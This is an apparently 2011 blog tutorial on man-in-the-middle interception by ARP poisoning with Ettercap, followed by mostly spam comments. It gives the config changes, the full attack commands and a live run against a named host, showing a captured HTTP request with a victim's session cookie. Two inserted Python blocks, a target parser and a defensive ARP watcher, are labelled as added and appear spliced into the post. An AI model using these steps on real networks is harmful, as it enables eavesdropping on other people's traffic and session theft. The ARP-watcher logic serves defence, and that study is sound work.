Security
20 June 2011

Man-In-The-Middle Attacks With Ettercap

Introduction

This post explains how to execute a man-in-the-middle attack on Linux. Only the actual attack is described here. The mechanisms of ARP poisoning and man-in-the-middle attacks are explained in a different post.

A man-in-the-middle attack can be achieved in various ways, but MITM through ARP poisoning is a common method.

In this post we demonstrate a MITM with the Ettercap tool. Ettercap is a multipurpose sniffer/interceptor/logger for switched LANs, and pretty much the Swiss army knife of ARP poisoning. Every security researcher should have it in their toolbox, and it is included in the BackTrack Linux distribution. Ettercap features a pretty nice GUI, but in this post we only use the text mode.

Command Syntax

The ettercap program has the following syntax:

ettercap [OPTIONS] [TARGET1] [TARGET2]

The targets can be IPs and MACs, and specific TCP and UDP ports can also be targeted. A short description of the TARGET1 and TARGET2 syntax is given below. Read the target specification section of the man page for details.

TARGET is in the form MAC/IPs/PORTs. 
 
If you omit any of the parts, it means a wildcard is used for that part.
 
Examples:
//80         means ANY mac address, ANY ip and ONLY port 80
/10.0.0.1/   means ANY mac address, ONLY ip 10.0.0.1 and ANY port
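The wildcard rule above is easy to misread (an empty part means ANY, and every TARGET has exactly two slashes), so here is an added example, not code from the post or from the Ettercap project, that parses the MAC/IPs/PORTs form into a matchable object. The comma-separated list and range forms it also accepts (10.0.0.1-3,10.0.0.9 for IPs, 20-22,80 for ports) follow the ettercap man page and are an assumption of this example; the post itself only shows the three wildcard cases.

```python
"""Parse an ettercap TARGET specification (MAC/IPs/PORTs) into a matcher.

Added example. Empty parts are wildcards, exactly as the post states:
  //80        -> ANY MAC, ANY IP, only port 80
  /10.0.0.1/  -> ANY MAC, only 10.0.0.1, ANY port
The list/range syntax (10.0.0.1-3,10.0.0.9 and 20-22,80) is taken from the
ettercap man page and is an assumption here, not something the post shows.
"""
import re
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import FrozenSet, Optional

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


@dataclass(frozen=True)
class Target:
    mac: Optional[str]                 # None means ANY MAC
    ips: Optional[FrozenSet[str]]      # None means ANY IP
    ports: Optional[FrozenSet[int]]    # None means ANY port

    def matches(self, mac: str, ip: str, port: Optional[int]) -> bool:
        """True if a frame with this MAC/IP/port falls inside the TARGET."""
        if self.mac is not None and mac.lower() != self.mac:
            return False
        if self.ips is not None and ip not in self.ips:
            return False
        if self.ports is not None and port not in self.ports:
            return False
        return True


def _expand_ports(spec: str) -> FrozenSet[int]:
    """'20-22,80' -> {20, 21, 22, 80}; rejects anything outside 0..65535."""
    ports = set()
    for item in spec.split(","):
        lo, _, hi = item.partition("-")
        lo_n = int(lo)
        hi_n = int(hi) if hi else lo_n
        if not 0 <= lo_n <= hi_n <= 65535:
            raise ValueError(f"bad port range: {item!r}")
        ports.update(range(lo_n, hi_n + 1))
    return frozenset(ports)


def _expand_ips(spec: str) -> FrozenSet[str]:
    """'10.0.0.1-3,10.0.0.9' -> the four dotted-quad strings (ranges on the last octet only)."""
    ips = set()
    for item in spec.split(","):
        prefix, _, last = item.rpartition(".")
        lo, _, hi = last.partition("-")
        lo_n = int(lo)
        hi_n = int(hi) if hi else lo_n
        if not 0 <= lo_n <= hi_n <= 255:
            raise ValueError(f"bad last-octet range: {item!r}")
        for octet in range(lo_n, hi_n + 1):
            # IPv4Address raises ValueError on anything that is not a valid address.
            ips.add(str(IPv4Address(f"{prefix}.{octet}")))
    return frozenset(ips)


def parse_target(spec: str) -> Target:
    """Split MAC/IPs/PORTs; an empty part becomes None (wildcard)."""
    parts = spec.split("/")
    if len(parts) != 3:
        raise ValueError("TARGET must be MAC/IPs/PORTs (empty part = ANY)")
    mac_s, ip_s, port_s = parts
    mac = None
    if mac_s:
        if not MAC_RE.match(mac_s):
            raise ValueError(f"bad MAC address: {mac_s!r}")
        mac = mac_s.lower()
    return Target(
        mac,
        _expand_ips(ip_s) if ip_s else None,
        _expand_ports(port_s) if port_s else None,
    )


if __name__ == "__main__":
    for spec in ("//80", "/10.0.0.1/", "//", "22:22:22:22:22:22/1.2.3.4/80"):
        print(f"{spec:32} -> {parse_target(spec)}")
```

Running the block prints the parsed form of the post's own examples; `matches()` is what a filter or an allow-list check would call per packet.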

Useful command line options are:

Parameter | Description | Required
-T | Use console interface | Yes (choose one of -T, -G, -D)
-G | Use the GTK+ GUI | Yes (choose one of -T, -G, -D)
-D | Daemonize (no interface) | Yes (choose one of -T, -G, -D)
-q | Quiet mode. It can be used only in conjunction with the console interface. It does not print packet content. | No
-i <interface> | Use the specified interface | No
-M <method:args> | Start a MITM attack using the provided parameters. The possible methods are arp, dhcp, icmp and port. | No
-M arp[:args] | Start an ARP MITM attack. The arguments are described below. | No

Ettercap Configuration

If you do a MITM attack with ettercap, it will have to ‘forward’ packets from the victim to the correct destination, and the other way around. In order for this to work you need to change the configuration file:

$ nano /usr/local/etc/etter.conf

Look for the following lines in the file, and uncomment them by removing the hashes (except for the one next to “if”). Save and close the file.

Change:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

To this:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

For ARP poisoning attacks, the configuration file has a lot of options. You should only change these if you know what you are doing. One example is the arp_poison_delay configuration option, which changes the interval at which ettercap re-spoofs the victim(s) during an ARP MITM attack:

arp_poison_warm_up = 1        # seconds
arp_poison_delay = 10         # seconds

The arp_poison_warm_up variable is the interval between the first five spoofed ARP packets. After that, the interval between the packets changes to arp_poison_delay.

Examples

We have an example scenario:

Host | Details
Attacker (the host running ettercap) | MAC=22:22:22:22:22:22
Victim | IP=1.2.3.4
Gateway | IP=1.2.0.0

All these hosts are in the same subnet (switched network). Remember that this is required, because ARP only works within a broadcast domain.

MITM on an Entire Subnet (not recommended)

ettercap -T -M arp // //

This is what the command line options do:

-T        Tells ettercap to use the text interface.
-M        Tells ettercap to execute a MITM attack.
arp       Denotes that ARP poisoning should be used to perform the attack.
// //     Tells ettercap that TARGET1 and TARGET2 consist of all hosts in the subnet.

The result is that for every combination of hosts in the subnet, both sides have their ARP cache poisoned. If there are 100 hosts in the subnet, this will cause a storm of 20,000 ARP packets to be sent. When successful, all network traffic will pass through the attacker’s system. I suggest only doing this on the smallest of networks.

Unidirectional MITM: Victim to Gateway

A more sensible and stealthy command is:

ettercap -T -M arp:oneway,remote /1.2.3.4/ /1.2.0.0/

This is what the command line options mean:

-T          Tells ettercap to use the text interface.
-M          Tells ettercap to execute a MITM attack.
arp         Denotes that ARP poisoning should be used to perform the attack.
oneway      The oneway option of the arp method specifies that the poisoning should be unidirectional: only from TARGET1 to TARGET2. Poisoning normal clients is less risky than poisoning a gateway, where an ARP watcher could be in place. By putting the gateway in TARGET2, it remains oblivious to the attack.
remote      The remote option of the arp method tells ettercap to not only sniff direct connections between TARGET1 and TARGET2, but also connections that pass through a TARGET to a remote IP, i.e. when one of the hosts is a gateway.
/1.2.3.4/   This tells ettercap that TARGET1 is the IP 1.2.3.4. The ARP cache of this host will be targeted.
/1.2.0.0/   This tells ettercap that TARGET2 is the IP 1.2.0.0. Because of the oneway directive this host is not poisoned.

Here is what the command does:

  1. First, the TARGET ranges are scanned with ARP requests to find all active hosts and their corresponding MAC addresses. In this case there is only one host per range: 1.2.3.4 in GROUP1 and 1.2.0.0 in GROUP2.
  2. Then all possible GROUP1 and GROUP2 combinations are spoofed. The only combination is 1.2.3.4 – 1.2.0.0, and because of the oneway argument only the ARP cache of 1.2.3.4 is poisoned:
    • Ettercap first sends a spoofed ICMP echo request (from IP 1.2.0.0) to force an ARP entry into the cache. Then it immediately sends a spoofed ARP reply to the victim at 1.2.3.4, containing the gateway IP 1.2.0.0 and the attacker’s MAC address 22:22:22:22:22:22. The victim updates its ARP cache, and any packets it thinks it is sending to the gateway are actually transmitted to the attacker.
  3. Ettercap automatically sniffs all traffic from the victim to the gateway, then forwards it to the gateway. Traffic in the other direction (gateway -> victim) does not pass through the attacker, so it cannot be sniffed.
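The oneway discussion above mentions that a gateway may be protected by an "ARP watcher", and step 2 spells out exactly what such a watcher sees: the gateway's IP suddenly announced with the attacker's MAC, and one MAC answering for more than one IP. The following is an added example of that detection logic, not code from the post or from Ettercap. It replays a constructed list of ARP replies (not a real capture); the IPs 1.2.3.4 and 1.2.0.0 and the MAC 22:22:22:22:22:22 come from the scenario table, while the gateway and victim MACs and the attacker's own IP 1.2.3.9 are made up for the sample.

```python
"""Minimal passive ARP watcher (added example, constructed sample data).

Two signals are checked, both visible in the spoofing sequence described above:
  1. an IP that was pinned (or previously learned) is announced with a new MAC;
  2. a single MAC announces itself as the owner of several IPs.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class ArpReply:
    """The fields of an ARP reply a listener cares about (sender side only)."""
    ts: float         # seconds since capture start
    sender_ip: str    # IP the sender claims to own
    sender_mac: str   # MAC it wants the recipient to cache for that IP


@dataclass(frozen=True)
class Alert:
    ts: float
    ip: str
    old_mac: str
    new_mac: str
    reason: str


class ArpWatcher:
    def __init__(self, static: Optional[Dict[str, str]] = None) -> None:
        # Pinned mappings (e.g. the gateway) are never relearned from the wire.
        self.static: Dict[str, str] = {ip: mac.lower() for ip, mac in (static or {}).items()}
        self.learned: Dict[str, str] = {}
        self.claims: Dict[str, Set[str]] = {}   # mac -> every IP it has ever announced
        self.alerts: List[Alert] = []

    def observe(self, reply: ArpReply) -> Optional[Alert]:
        """Feed one reply; return an Alert if it contradicts what we know."""
        mac = reply.sender_mac.lower()
        ip = reply.sender_ip
        self.claims.setdefault(mac, set()).add(ip)

        if ip in self.static:
            if self.static[ip] == mac:
                return None
            alert = Alert(reply.ts, ip, self.static[ip], mac,
                          "pinned host announced with a different MAC")
        else:
            known = self.learned.get(ip)
            self.learned[ip] = mac          # dynamic hosts may legitimately move
            if known is None or known == mac:
                return None
            alert = Alert(reply.ts, ip, known, mac, "learned IP-to-MAC mapping changed")
        self.alerts.append(alert)
        return alert

    def macs_claiming_several_ips(self) -> Dict[str, Set[str]]:
        """One MAC answering for two or more IPs is the other tell-tale of poisoning."""
        return {mac: ips for mac, ips in self.claims.items() if len(ips) > 1}


# Constructed replay of the oneway scenario. Gateway/victim MACs and the
# attacker IP 1.2.3.9 are invented; the other values are from the post.
SAMPLE_REPLIES = [
    ArpReply(0.0, "1.2.0.0", "00:00:0c:07:ac:00"),   # genuine gateway reply
    ArpReply(0.5, "1.2.3.4", "00:2b:4d:11:66:30"),   # genuine victim reply
    ArpReply(1.0, "1.2.3.9", "22:22:22:22:22:22"),   # attacker answering for its own IP
    ArpReply(2.0, "1.2.0.0", "22:22:22:22:22:22"),   # spoofed: gateway IP, attacker MAC
    ArpReply(12.0, "1.2.0.0", "22:22:22:22:22:22"),  # re-spoof after arp_poison_delay
]


def run_sample(replies: List[ArpReply] = SAMPLE_REPLIES) -> ArpWatcher:
    """Pin the gateway's real MAC, replay the sample, return the watcher state."""
    watcher = ArpWatcher(static={"1.2.0.0": "00:00:0c:07:ac:00"})
    for reply in replies:
        watcher.observe(reply)
    return watcher


if __name__ == "__main__":
    w = run_sample()
    for a in w.alerts:
        print(f"t={a.ts:5.1f}  {a.ip}: {a.old_mac} -> {a.new_mac}  ({a.reason})")
    print("MACs claiming several IPs:", w.macs_claiming_several_ips())
```

Pinning the gateway is the design choice that matters: a watcher that simply relearns every new mapping would log the first spoofed reply and then treat the attacker's MAC as the truth. For dynamic hosts the watcher does relearn, which is why a moved DHCP client produces one alert rather than a stream of them.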

Sniffing with a Filter

If your host is acting as a gateway (for instance after the MITM above), ettercap can sniff the traffic that passes through it.

ettercap -T -z --proto tcp -f "src host 1.2.3.4 or port 80" //

Use the above syntax to listen for and display all TCP traffic with source IP 1.2.3.4 or with source/destination port 80.

-T                                 Tells ettercap to use the text interface.
-z                                 Silent mode. Tells ettercap to skip the initial ARP scan of the entire subnet (it does this even before sniffing).
--proto tcp                        Tells ettercap to only sniff TCP traffic.
-f "src host 1.2.3.4 or port 80"   Tells ettercap to apply the specified libpcap filter to the traffic.
//                                 Tells ettercap that we want to look at traffic from the entire subnet.

In Practice

Find the IP of the default gateway (router):

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
132.49.120.0    0.0.0.0         255.255.240.0   U     0      0        0 eth0
0.0.0.0         132.49.120.1    0.0.0.0         UG    100    0        0 eth0

Attack the host with IP 132.49.120.168.

$ sudo ettercap -T -M arp:oneway,remote /132.49.120.168/ /132.49.120.1/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 
Listening on eth0... (Ethernet)
 
eth0 -> 00:01:40:34:A1:92    132.49.120.121     255.255.240.0
 
Privileges dropped to UID 65534 GID 65534...
 
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
 
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
 
2 hosts added to the hosts list...
 
ARP poisoning victims:
 
GROUP 1 : 132.49.120.168 00:2B:4D:11:66:30
 
GROUP 2 : 132.49.120.1 00:00:0C:07:AC:00
Starting Unified sniffing...
 
Text only Interface activated...
Hit 'h' for inline help
 
Mon Jun 20 14:08:31 2011
TCP  132.89.120.168:8304 --> 83.143.78.29:80 | AP
 
tSuite/TestController.asp?TestTypeID=,8,12,.
Cookie: ASPSESSIONIDAASASSDC=ICEHOOJDKFAIDEPINIGONNAJ; __utma=236849091.1657384024.1308593949.1308593949.1308593949.1; __utmb=236849091; __utmc=236849091; __utmz=236849091.1308593949.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none).
.
../...3C..e.._.......:..Q4.|Sn..g..@..i...l.'...+h.(.nj.T..f0..-.5..mF.8^T=n[IK{9T..F...I(.!~6....4O.J.uaH...-..S......e..76wJ..u..Es.....4..}}'.N....F.......:.~j...M^.....W......tC.....v.s..%..b.Z..T7u./....!..C*...x...0e...5.#..n..Q.X..&r..>.&T.lz../.Z2T.".NKi...a.q......."....b+........-.:....j......e=.Ji.@Bdn.....cu.Y.  ~Xj.5.|,.. .,a...z|....LP,..>.......).u.......

We are now picking up the traffic between our victim and some website (the packet above is an HTTP request, followed by binary payload data).

9 Responses to “Man-In-The-Middle Attacks With Ettercap”

  1. any new treatment for tinnitus 12 February 2013 at 6:21 am #

    I don’t drop many remarks, however i did some searching and wound up here Man-In-The-Middle Attacks With Ettercap | Tech Juice. And I do have a few questions for you if you tend not to mind. Is it only me or does it look as if like some of the responses appear as if they are written by brain dead folks? :-P And, if you are writing on additional sites, I would like to follow anything fresh you have to post. Would you list of the complete urls of all your public sites like your twitter feed, Facebook page or linkedin profile?

  2. carneous 13 February 2013 at 10:15 am #

    Salutations, my very full on this subject and your efforts, and sorry for my very bad English because I use Google Translator.
    I tested this method and the only problem I inconveneans or renconterer is that after having run the attack my connection is very, very bad. Do you have a solution?
    I use BT 5 R3 under VMware, wireless card Alfa 500
    attacker my pc
    victim my laptop
    and thank you in advance

  3. sell property quickly 27 February 2013 at 12:41 am #

    With having so much content do you ever run into any issues of plagiarism or copyright violation?
    My site has a lot of exclusive content I’ve either authored myself or outsourced but it looks like a lot of it is popping it up all over the internet without my agreement. Do you know any solutions to help reduce content from being stolen? I’d genuinely appreciate it.

  4. michaelkorsfactoryoutl 13 March 2013 at 5:11 am #

    You’ve observed lots of purse styles previously however exactly what are you aware concerning the Michael kors purses? If you don’t learn about all of them, indeed they’re known as because catchy purses. They’re really distinctive, historical, fascinating, incredible, magical, reliable, expert, inexpensive as well as long lasting purses versions, getting your own eye past the actual creativity. Presently Michael kors purses can be found in their very own unique designs as well as designs within the globally marketplace inside least expensive cost prices. The actual creative designers associated with Michael kors purses produce as well as create your own purses having a unique treatment, commitment, dedication, professionalism and reliability, as well as personal inspiration. More to the point, these people frequently make use of lamination methods (Glossy/Matte completing) because of that your personal Michael kors purses appear really distinctive as well as catchy away from personal creativity. Significantly on the internet purses store provides you with inexpensive Michael kors purses globally inside a the majority of expert as well as devoted method. michael kors factory outlet http://michaelkorsfactoryoutlet2013.webstarts.com/

  5. depressiom in men 1 April 2013 at 9:24 am #

    I am not sure where you’re getting your info, but good topic. I need to spend some time learning more or working out more. Thanks for the wonderful information; I used to be in search of this info for my mission.

  6. Pwnr127001 1 April 2013 at 1:30 pm #

    As another has stated; I rarely post anything to tutorials. But, that being said, this tut is more intuitive and concise than a lot of other tuts. Most tuts are written on one site; copied; rewritten, reworded, then reposted. I am no spring chicken when it comes to Ettercap (or most other netsec tools) and I have been attending Google University for a while now. I will have my tech-juice with my h4x0rflakes. Breakfast of Champions.

  7. Marilynn 25 April 2013 at 9:06 am #

    I was recommended this blog by way of my cousin. I’m now not positive whether this post is written by means of him as nobody else recognise such targeted about my trouble. You’re wonderful!
    Thanks!

  8. Gabriel 26 April 2013 at 5:18 am #

    Simply desire to say your article is as astounding. The clarity to your put
    up is simply great and i could assume you are a professional on this
    subject. Fine along with your permission let me to grab your feed to stay
    up to date with imminent post. Thanks a million and please
    carry on the gratifying work.

  9. would you believe that something as simple as how you dress could affect your attitude and self1 16 May 2013 at 11:47 am #

    I am really impressed with your writing skills and also with the layout on your weblog. Is this a paid theme or did you modify it yourself? Either way keep up the excellent quality writing, it’s rare to see a nice blog like this one nowadays
